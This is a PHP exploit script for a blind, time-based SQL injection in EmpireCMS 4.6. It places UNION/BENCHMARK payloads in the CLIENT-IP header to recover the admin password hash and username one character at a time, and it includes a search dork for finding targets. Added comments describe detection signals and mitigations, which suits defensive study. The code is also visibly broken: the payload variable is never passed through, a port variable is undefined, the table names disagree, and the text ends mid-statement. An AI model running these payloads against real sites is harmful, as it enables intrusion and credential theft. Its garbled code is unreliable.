EmpireCMS 4.6 Blind SQL Injection Exploit

<?php
/*
        EmpireCMS Version 4.6 (/e/tool/gfen/index.php) Blind SQL Injection Exploit
        fuck php>=5 (remainder of this line is mojibake in the original and could not be recovered)
        author...: Flyh4t
        mail.....: flyh4t@126.com
        link.....: http://hi.baidu.com/flyhat
        dork.....: "Powered by EmpireCMS"

        Reviewer notes (defensive reading of this proof of concept):
        - Vulnerable input, as used below: the CLIENT-IP request header sent to
          /e/tool/gfen/index.php. The header value is placed into a SQL statement
          without parameterisation, so a value containing a quote and a UNION
          changes the query.
        - Oracle: time-based. BENCHMARK() makes the response slow only when the
          guessed byte matches, and check_query() treats any response slower than
          twice the measured baseline as a hit. No data is returned in the body.
        - Detection signals visible in this script: requests to
          /e/tool/gfen/index.php?id=1 whose CLIENT-IP header contains a single
          quote, "union", "/**/" comment padding or "BENCHMARK(", arriving in
          bursts (three baseline probes, then one or more probes per recovered
          character) with markedly elevated response times.
        - Mitigation: treat CLIENT-IP / X-Forwarded-For style headers as untrusted
          input, never derive SQL from them, and use prepared statements. Rate
          limiting alone does not close the issue; it only slows recovery.
*/


error_reporting(0);
ini_set("default_socket_timeout",5);
set_time_limit(0);

/**
 * Send a raw HTTP request and return the complete response.
 *
 * Opens a TCP connection to $host on port 80, retries up to ten times with a
 * one second pause when the socket cannot be opened (exits via die() after
 * that), writes $packet verbatim and then reads one byte at a time until EOF.
 *
 * @param string $host   target host name or IP
 * @param string $packet full HTTP request text, headers and terminating CRLFCRLF included
 * @return string raw response (status line, headers and body)
 */
function http_send($host, $packet)
{
        $i = 0;
        $sock = fsockopen($host, 80);
        while (!$sock)
        {
                if ($i++ == 10) die();
                print "\n[-] No response from ".$host.":80 Trying again...\n";
                $sock = fsockopen($host,$port);
                sleep(1);
        }
        fputs($sock, $packet);
        $resp = "";
        // Byte-wise read until the server closes the connection; the caller
        // only needs the elapsed wall-clock time or a substring of the reply.
        while (!feof($sock)) $resp .= fread($sock, 1);
        fclose($sock);
        return $resp;
}

/**
 * Current wall-clock time in seconds as a float (legacy microtime() parsing).
 *
 * @return float seconds since the Unix epoch with sub-second precision
 */
function getmicrotime()
{
        list($usec, $sec) = explode(" ", microtime());
        return ((float)$usec + (float)$sec);
}

/**
 * Issue one probe request and measure its round-trip time.
 *
 * Builds a GET for $path/e/tool/gfen/index.php?id=1 with a fixed browser-like
 * header set; the CLIENT-IP header is where the injection payload is placed
 * for this endpoint. The request is timed around http_send().
 *
 * Reads globals $host and $path.
 *
 * @param string $query payload intended for the CLIENT-IP header
 * @return float elapsed time in milliseconds
 */
function getdelay($query)
{
        global $host, $path;

        $pck = "GET ".$path."/e/tool/gfen/index.php?id=1 HTTP/1.1\r\n";
        $pck .= "Accept: */*\r\n";
        $pck .= "Accept-Language: zh-cn\r\n";
        $pck .= "Accept-Encoding: gzip, deflate\r\n";
        $pck .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)\r\n";
        $pck .= "CLIENT-IP: $sql\r\n";
        $pck.= "Host: ".$host."\r\n";
        $pck.= "Keep-Alive: 300\r\n";
        $pck.= "Connection: keep-alive\r\n\r\n";
        $start = getmicrotime()*1000;
        http_send($host, $pck);
        $end = getmicrotime()*1000;

        return ($end - $start);
}

/**
 * Measure the baseline response time (no BENCHMARK() executed).
 *
 * The IF(1=0, ...) condition is always false, so the heavy branch never runs;
 * three probes are averaged to smooth network jitter.
 *
 * Reads globals $count, $prefix and $uid.
 *
 * @return int average round-trip time in milliseconds
 */
function normaldelay()
{
        global $count, $prefix, $uid;

        $sql = "127.0.0.1' union SELECT/**/username/**/FROM/**/".$prefix."_enewsuser/**/WHERE/**/userid=".$uid."/**/AND/**/RAND(IF(1=0,BENCHMARK(".$count.",MD5(1)),0))/*";
        $d1 = getdelay($sql);
        $d2 = getdelay($sql);
        $d3 = getdelay($sql);
        $m = ($d1 + $d2 + $d3) / 3;
        return (intval($m));
}

/**
 * Measure the response time of a second reference probe, averaged over three requests.
 *
 * Same statement shape as normaldelay() with a different leading value; the
 * result is only printed for the operator and is not used by check_query().
 *
 * Reads globals $count, $prefix and $uid.
 *
 * @return int average round-trip time in milliseconds
 */
function benchmarkdelay()
{
        global $count, $prefix, $uid;

        $sql = "1' union SELECT/**/username/**/FROM/**/".$prefix."_enewsuser/**/WHERE/**/userid=".$uid."/**/AND/**/RAND(IF(1=0,BENCHMARK(".$count.",MD5(1)),0))/*";
        $d1 = getdelay($sql);
        $d2 = getdelay($sql);
        $d3 = getdelay($sql);
        $m = ($d1 + $d2 + $d3) / 3;
        return (intval($m));
}

/**
 * Timing oracle: did this probe take more than twice the baseline?
 *
 * A single measurement is used, so network jitter can produce both false
 * positives and false negatives; this is the weak point of the technique and
 * the reason a defender sees repeated, slow requests rather than one.
 *
 * Reads global $ndelay (baseline from normaldelay()).
 *
 * @param string $query payload to time
 * @return bool true when the measured delay exceeds 2 * $ndelay
 */
function check_query($query)
{
        global $ndelay;

        $ret = false;
        $d = intval(getdelay($query));
        if ($d > ($ndelay * 2)) $ret = true;
        return $ret;
}

/**
 * Sanity-check the target before probing.
 *
 * Sends one request whose CLIENT-IP header holds a minimal UNION payload and
 * looks for a "Location" substring in the reply; absence is treated as
 * "probably wrong MySQL version" and the script exits. Prints progress.
 *
 * Reads globals $host and $path.
 *
 * @return void
 */
function check_target()
{
        global $host, $path;

        print "\n[-] Checking $host...";
        $pck = "GET ".$path."/e/tool/gfen/index.php?id=1 HTTP/1.1\r\n";
        $pck .= "Accept: */*\r\n";
        $pck .= "Accept-Language: zh-cn\r\n";
        $pck .= "Accept-Encoding: gzip, deflate\r\n";
        $pck .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)\r\n";
        $pck .= "CLIENT-IP: 127.0.0.1' union select 1/*\r\n";
        $pck.= "Host: ".$host."\r\n";
        $pck.= "Keep-Alive: 300\r\n";
        $pck.= "Connection: keep-alive\r\n\r\n";
        $buff = http_send($host, $pck);
        // strpos() is used as a boolean here; a "Location" at offset 0 would
        // also be treated as absent, which the author evidently accepted.
        if (!strpos($buff, "Location"))
                die("\n\n[-] Error... Probably wrong MySQL version!\n");
        else
                print " OK!\n";
}

print "\n+-----------------------------------------------------------------------------+";
print "\n| EmpireCMS Version 4.6 (/e/tool/gfen/index.php) Blind SQL Injection Exploit  |";
print "\n| by flyh4t[cnsst.org]                                                        |";
print "\n| thx EgiX                                                                    |";
print "\n+-----------------------------------------------------------------------------+\n";

// Command-line contract: host and path are required, the rest are optional.
if ($argc < 3)
{
        print "\nUsage:                php $argv[0] host path [delay] [prefix] [userid]\n";
        print "\nhost:                target server (ip/hostname)";
        print "\npath:                path to ecms directory";
        print "\ndelay:                delay for BENCHMARK() (dafault: 1000000)";
        print "\nprefix:                table's prefix (default: phome)";
        print "\nuserid:                user id (default: 1 - admin)\n";
        die();
}

// Globals read by the helper functions above.
$host        = $argv[1];
$path        = $argv[2];
$count        = (isset($argv[3]) ? $argv[3] : 1000000);   // BENCHMARK() iteration count
$prefix        = (isset($argv[4]) ? $argv[4] : "phome");  // table prefix
$uid        = (isset($argv[5]) ? $argv[5] : "1");         // row selected by userid

check_target();

// Calibrate the timing oracle; $ndelay is the threshold basis in check_query().
print "\n[-] Testing delay time...";
$ndelay = normaldelay();
print "\n[-] Normal delay: $ndelay ms";
$bdelay = benchmarkdelay();
print "\n[-] Benchmark delay: $bdelay ms\n";

// Candidate byte values for a hex digest: NUL terminator, '0'-'9', 'a'-'f'.
$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$index = 1; $md5 = "";
print "\n[-] MD5 Hash: ";

// Recover the password column one byte at a time. The outer loop stops once a
// NUL (ORD() of the position past the end of the string) has been accepted;
// the inner loop exits the script if no candidate produced a slow response.
while (!strpos($md5, chr(0)))
{
        for ($i = 0; $i <= count($hash); $i++)
        {
                if ($i == count($hash)) die("\n[-] Exploit failed...\n");

                $sql = "127.0.0.1' union SELECT/**/password/**/FROM/**/".$prefix."_users/**/WHERE/**/userid=".$uid."/**/OR/**/" .
                "RAND(IF((ORD(SUBSTRING(password,".$index.",1))=".$hash[$i]."),BENCHMARK(".$count.",MD5(1)),1))/*";

                if (check_query($sql))
                {

                        $md5 .= chr($hash[$i]);
                        print chr($hash[$i]);
                        break;
                }
        }

        $index++;
}

// Candidate byte values for the username column.
$char = array(0); // null char
for ($j = 97; $j <= 122; $j++) $char = array_merge($char, array($j)); // a-z
for ($j = 65; $j <= 90; $j++) $char = array_merge($char, array($j)); // A-Z
for ($j = 48; $j <= 57; $j++) $char = array_merge($char, array($j)); // 0-9

$index = 1; $user = "";
print "\n[-] Username: ";

// Same oracle applied to the username column, with candidate values drawn
// from $char; the loop bound is the one used above (count($hash)).
while (!strpos($user, chr(0)))
{
        for ($i = 0; $i <= count($hash); $i++)
        {
                if ($i == count($hash)) die("\n[-] Exploit failed...\n");

                $sql = "127.0.0.1' union SELECT/**/username/**/FROM/**/".$prefix."_users/**/WHERE/**/userid=".$uid."/**/OR/**/" .
                "RAND(IF((ORD(SUBSTRING(username,".$index.",1))=".$char[$i]."),BENCHMARK(".$count.",MD5(1)),1))/*";

                if (check_query($sql))
                {
                        $user .= chr($char[$i]);
                        print chr($char[$i]);
                        break;
                }
        }

        $index++;
}

print 